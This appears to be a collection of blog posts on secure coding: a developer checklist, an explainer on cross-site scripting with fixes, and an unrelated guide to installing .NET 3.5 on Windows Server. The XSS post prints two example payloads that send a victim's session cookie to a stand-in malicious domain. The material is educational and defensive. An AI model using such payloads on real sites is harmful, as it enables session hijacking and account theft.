Essentials of Secure Coding

Build Security, Test Security or Both?

Generally it is easier to build a secure software than to correct security flaws later, let alone an eventuality of a security breach. Cost of a security breach can be humongous and unbearable at times. Security attacks are gradually shifting base to the application layer in the software ecosystem as shown by a study which reported more than 60% of attacks on the internet are against web applications.

Software security flaws can be introduced at any stage of software development life cycle. Possible stages/ways of introduction of security flaws are as follows:

• Introduction of security flaws by design errors
• Introduction of security flaws by undefined security requirements
• Introduction of security flaws by bad coding practices
• Introduction of security flaws by incorrect deployment
• Introduction of security flaws in maintenance/fixes
• Introduction of security flaws in software updates 

So What Do We Do?

To build a secure software  there are several to dos and must haves. While detection of security vulnerabilities using security testing is a reactionary approach a mature development model assimilating security into it is more likely to produce minimal vulnerabilities when the software system is security tested and subsequently released.


Software security maturity models recommend various practices, processes, training to achieve a secure software development and delivery ecosystem.  However eventually most essential base for developing secure software is to bring secure coding practices on the work floor and making it integral part of the entire echo system. Each and every developer should and must learn secure coding practices and make it a part of implementation while coding.

Explicitly State Security Requirements

Security requirements should be ‘a must have’ in requirements document. Just like any other requirement they need to be elaborated thoroughly before implementation. Focusing only on functional requirement has been the primary factor for slippage of vulnerabilities and hence the development of insecure software. Developers and related product teams should be aware that there are tools and proxies available to intercept, analyze and modify the application traffic/request /response. If vulnerabilities creep in these layers they are likely to be exploited and have consequences. 

Essential Security Checklist for Coders

Every coder should have essential security checklist in his mind when coding. High level headers in this checklist should include the following:

• Data Protection
• Input Validation
• Output Encoding
• Access control
• Session Management
• Authentication and Password Management
• Database Security
• Memory Management  
• File Management
• Cryptographic Techniques
• System Configuration
• Error Handling and Logging

Data Protection

Implement the system of least privilege and encrypt all sensitive information that is stored. Do not store passwords, connection strings, or other sensitive information in clear text. Protect backend code from download or comments revealing useful information. HTTP GET request parameters should not include sensitive information and disable/filter/encrypt client side caching. Application should also support removal of sensitive data when not required. 

Input Validation

Canonicalize input data i.e. all inputs should be encoded in common character set, such as UTF-8 before being validated. Input validation should be uniform and central to the entire application using a uniform set of rules for validation of input data. Validate expected data type, range, length, and ensure that header values in request and response contain only ASCII chars. If commonly known potential hazardous characters, such as < > " ' % ( ) & + \ \' \" are to be allowed in application input then make sure to have additional sanitization measures such as output encoding. Also make sure you check for the following if it is not a part of the standard input validation routine:

Check for null bytes ()

Check for new line characters (%0d, %0a, \r, \n)

Check for “dot-dot-slash" (../ or ..\) path alterations characters.

Output Encoding

All characters must be encoded unless the intended interpreter is known to be safe. Encoding must be done on a trusted system which is typically the server. Contextually sanitize all output of untrusted data to queries for LDAP, SQL and XML. An example of HTML entity encoding is as follows:
Convert > to &gt; 
Convert < to &lt; 
Convert “ to &quot;
Convert ‘ to &#x27;

Convert / to &#2F;

Access Control

Enforce authorization control on every request that comes from both: server side scripts and client side scripts. Restrict the following only to authorized users:

• Access to protected URLs and functions
• Direct object references
• Access to services and application data
• Policy information used for access controls

Limit number of transactions a single user/device can perform and revalidate long authentication sessions. Ensure the application supports disabling of account and forced logouts. 

Session Management

Every application requires a set of controls that help ensure web applications handle HTTP sessions in a secure manner. Set of common practices that help in secure session management are as follows:

• Session inactivity timeout should be as short as possible
• Always use frameworks session management controls on a trusted server
• All pages protected by authorization should have logout
• Logout should kill associated session or connection
• Session information should not be revealed in URL
• Re-authentication should always generate new session identifier
• Disallow concurrent logins with same user ID
• Cookies transported over TLS need to be set as ‘secure’
• Replace the per session paradigm to per request for highly sensitive transactions
• Always set cookies with HttpOnly attribute, until unavoidable  

These essentials when kept in mind while coding and designing build a strong foundation for a secure application development and delivery. Will try putting up more points to the checklist in following posts.

XSS or Cross-Site Scripting Why You Need to Know

Why You need to Know about XSS

One of the most common types of Web Application vulnerability threat is called XSS or Cross-site scripting. This attack targets the end user instead of the Web Application using client-side web technologies, such as JavaScript and HTML. Attacks are carried out by embedding malicious script to client side scripting languages and can be associated with user action or every time the page loads.

Using a web application as medium attackers can hijack sessions display unwanted advertisements, steal account information, transfer/activate malwares on the end users machine. Attackers are able to bypass security restrictions and are able to execute malicious code behind victims firewall using vulnerable Web Applications.

How you become vulnerable?

When vulnerable web applications take data from users and make it a part of the web application presentation or client without required validation then the users of the application can be potential victims. If the data is not validated, it can be used to embed/run malicious code to enable the attacker to perform session hijack, steal account information, access browser history, access clipboard content, control browser remotely, access intranet resources and applications.

Where do the vulnerabilities come from?

XSS Vulnerabilities can arise from lack of validation of user input at the client side or server side or both.

Lack of validation on the client side can expose victims to DOM-Based XSS attacks. Using API access through the DOM standard malicious script can be injected into a web page without the data being sent to the server. Web application that use Java or ActiveX to modify HTML based on the user input without sending the content to the server are prone to DOM-Based XSS attacks if the input is not validated on the client side.

A user can be induced to performing an action on the web page which looks legitimate like clicking on a link. This action can help replace/inject/append malicious JavaScript which is sent to the server. The server then responds to the submission from the client considering it to be a genuine request/submission. Confidential information may be revealed or other harmful activities can be performed by the attacker by adding malicious code to a genuine transaction. This attack method is called reflective XSS.

Attackers can store malicious code in database from where it is available to be executed again and again. This stored XSS attack is more dangerous as here the attacker does not have to make user do any suspicious web action. For example if an application allows user to enter profile name which is then displayed on a page for other users to access can be exploited by attackers to attach malicious JavaScript if the username filed is not properly sanitized. So whenever a user clicks on the username to check it profile the malicious script gets executed.

Examples of flawed code:

This XSS JavaScript example is delivered to the user through clicking on a malicious link. The XSS request is initiated from the victim’s browser, sent to the vulnerable web application, and then reflected back to execute in the context of the user's session.

http://www.bigsafebank~~~/search.asp?q=<script>x=new Image;x.src = http://malicious-domain~~~/hijackedsession.php?session-cookie=+document.cookie ;</script>

This XSS Javascript example is inputted as part of the attacker’s user name. Here a fraudulent user exploits the fact that the web application stores each user name in a local database that fails to sanitize the name field, leaving it open to XSS attacks. When other users view the attacker’s profile page, the code executes in the context of their session.

http://www.bigsafebank.com/search.asp?q=<script>x=new Image;x.src = http://maliciousdomain~~~/hijackedsession.php?sessioncookie=”+document.cookie;</script>

How to Fix XSS Flaws  

Malicious code is normally inserted as a part of GET or POST parameter. So all inputs from the have to be sanitized without fail. All input should be converted to single character encoding before parsing. VALIDATE all user inputs from browsers to Applications.

Before reflecting the data back to the user it has to be escaped, filtered after validation. Convert special characters like <, >,?, &, /  and spaces to their respective URL or HTML encoded equivalents. URL encode all user input returned as part of URLs. HTML encode all user input returned as part of HTML.

Users should be allowed to disable client side scripts which may lead to loss of application functionalities but can prevent susceptible users to be exploited from malicious script. 

Installing Microsoft .Net3.5 on Windows Server 2012 R2

Looking at the title it looks damn simple but I had to spend quite a lot of time to get this done. Windows server 2012 will not allow to install .NET Framework 3.5 by triggering the 'exe' or the installer file. A message is returned that Windows server roles and features cannot be automatically installed or uninstalled via Windows Features control panel. It will prompt you to go to the 'Server Manager' or to use the 'Server Manager cmdlets' for Windows PowerShell.


However when I tried to use the recommended method following error was returned and the installation of .NET Framework 3.5 failed. Error screen looks like this:  

Windows logs present in 'C:\Windows\Logs\CBS' will have error messages and code '0x800F0906'.


Generally people try to retrofit sources available on Internet by putting them in source path or specifying new source path. It did not work for us. What worked for us was the following:

Steps to Resolve:

 


Click the search icon on desktop as shown in the image below:

Type 'Group Policy' in the search text box

Open the 'Edit Group Policy' returned in the search item


Navigate to Administrative Templates-->System 


Scroll down in 'System' pane and open 'Specify settings for optional component installation and component repair'

Select the Enabled option. By default it will be 'Not Configured'


Make sure check the checkbox for 'Contact Windows Update directly to download repair content instead of Windows Server Repair Services (WSUS)' 

Click on 'Apply' and 'Ok'


Retry the installation while you are online.